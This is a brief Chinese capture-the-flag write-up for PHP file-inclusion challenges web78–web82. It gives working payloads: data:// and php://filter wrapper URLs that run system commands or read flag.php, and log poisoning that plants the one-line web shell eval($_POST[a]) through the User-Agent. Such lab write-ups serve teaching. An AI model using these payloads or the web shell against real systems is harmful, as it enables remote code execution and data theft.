web78: 文件包含系列开始
题解:
本题没有过滤,所以有三种方法:
1.data伪协议(推荐,可以使用ls命令查看flag位置 )
?file=data://text/plain,<?php system("ls")?>
? file=data://text/plain,<?php system("tac flag.php")?>
2.filter伪协议(不推荐,不知道flag在哪时不好用)
?file=php://filter/convert.base64-encode/resource=flag.php
3.日志包含(推荐,伟大无需多言)
?file= ../../../../var/log/nginx/access.log
<?php eval($_POST[a]);?>
web79: 文件包含系列开始
因为此题过滤了php,则我们用"=" 来代替这个php即可,如上图所示得到flag。
web80: 文件包含系列开始
此题,由于伪协议不能用,那我们就用日志包含即可,先抓取包,在UA里面输入代码,如下图所示:
上传成功了,最后在通过日志来找flag。如下图所示:
你执行就会得到flag,不过这并不是flag.php,而是fl0g.php,因此我们需要在此之前,需要通过命令1=system('ls'); 查看一下到底有哪些文件。
web81: 昨晚这道题,你就已经经历了九九八十一难,后面还有919难,加油吧,少年!
此题,比前一题多过滤了一个冒号,对我们的日志包含,并不影响,因此,仍然可以用上一题来解
web82: 竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件
既然题目都这么说了,那么我们就用条件竞争来解决。